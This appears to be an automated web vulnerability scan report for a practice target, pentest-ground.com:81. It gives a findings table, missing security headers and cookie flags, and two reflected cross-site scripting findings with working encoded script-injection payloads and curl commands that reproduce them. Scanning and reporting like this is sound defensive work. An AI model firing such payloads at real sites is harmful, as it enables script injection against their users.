Date of the scan: Mon, 16 Mar 2026 20:43:45 +0000. Scope of the scan: folder
| Category | Number of vulnerabilities found |
|---|---|
| Backup file | 0 |
| Blind SQL Injection | 0 |
| Weak credentials | 0 |
| CRLF Injection | 0 |
| Content Security Policy Configuration | 1 |
| Cross Site Request Forgery | 0 |
| Potentially dangerous file | 0 |
| Command execution | 0 |
| Path Traversal | 0 |
| Htaccess Bypass | 0 |
| HTTP Secure Headers | 4 |
| HttpOnly Flag cookie | 1 |
| Open Redirect | 0 |
| Secure Flag cookie | 1 |
| SQL Injection | 0 |
| Server Side Request Forgery | 0 |
| Cross Site Scripting | 2 |
| XML External Entity | 0 |
| Internal Server Error | 0 |
| Resource consumption | 0 |
| Fingerprint web technology | 0 |
CSP is not set
GET / HTTP/1.1 Host: pentest-ground.com:81
curl "https://pentest-ground.com:81/"
X-Frame-Options is not set
GET / HTTP/1.1 Host: pentest-ground.com:81
curl "https://pentest-ground.com:81/"
X-XSS-Protection is not set
GET / HTTP/1.1 Host: pentest-ground.com:81
curl "https://pentest-ground.com:81/"
X-Content-Type-Options is not set
GET / HTTP/1.1 Host: pentest-ground.com:81
curl "https://pentest-ground.com:81/"
Strict-Transport-Security is not set
GET / HTTP/1.1 Host: pentest-ground.com:81
curl "https://pentest-ground.com:81/"
HttpOnly flag is not set in the cookie : SessionID
GET / HTTP/1.1 Host: pentest-ground.com:81
curl "https://pentest-ground.com:81/"
Secure flag is not set in the cookie : SessionID
GET / HTTP/1.1 Host: pentest-ground.com:81
curl "https://pentest-ground.com:81/"
XSS vulnerability found via injection in the parameter title
POST /1/edit HTTP/1.1 Host: pentest-ground.com:81 Referer: https://pentest-ground.com:81/1/edit Content-Type: application/x-www-form-urlencoded title=%3C%2Ftitle%3E%3CScRiPt%3Ealert%28%27wz1yuq5po2%27%29%3C%2FsCrIpT%3E&content=Hi+there%21
curl "https://pentest-ground.com:81/1/edit" -e "https://pentest-ground.com:81/1/edit" -d "title=%3C%2Ftitle%3E%3CScRiPt%3Ealert%28%27wz1yuq5po2%27%29%3C%2FsCrIpT%3E&content=Hi+there%21"
XSS vulnerability found via injection in the parameter title
POST /2/edit HTTP/1.1 Host: pentest-ground.com:81 Referer: https://pentest-ground.com:81/2/edit Content-Type: application/x-www-form-urlencoded title=%3C%2Ftitle%3E%3CScRiPt%3Ealert%28%27w6hfnufl64%27%29%3C%2FsCrIpT%3E&content=Hi+there%21
curl "https://pentest-ground.com:81/2/edit" -e "https://pentest-ground.com:81/2/edit" -d "title=%3C%2Ftitle%3E%3CScRiPt%3Ealert%28%27w6hfnufl64%27%29%3C%2FsCrIpT%3E&content=Hi+there%21"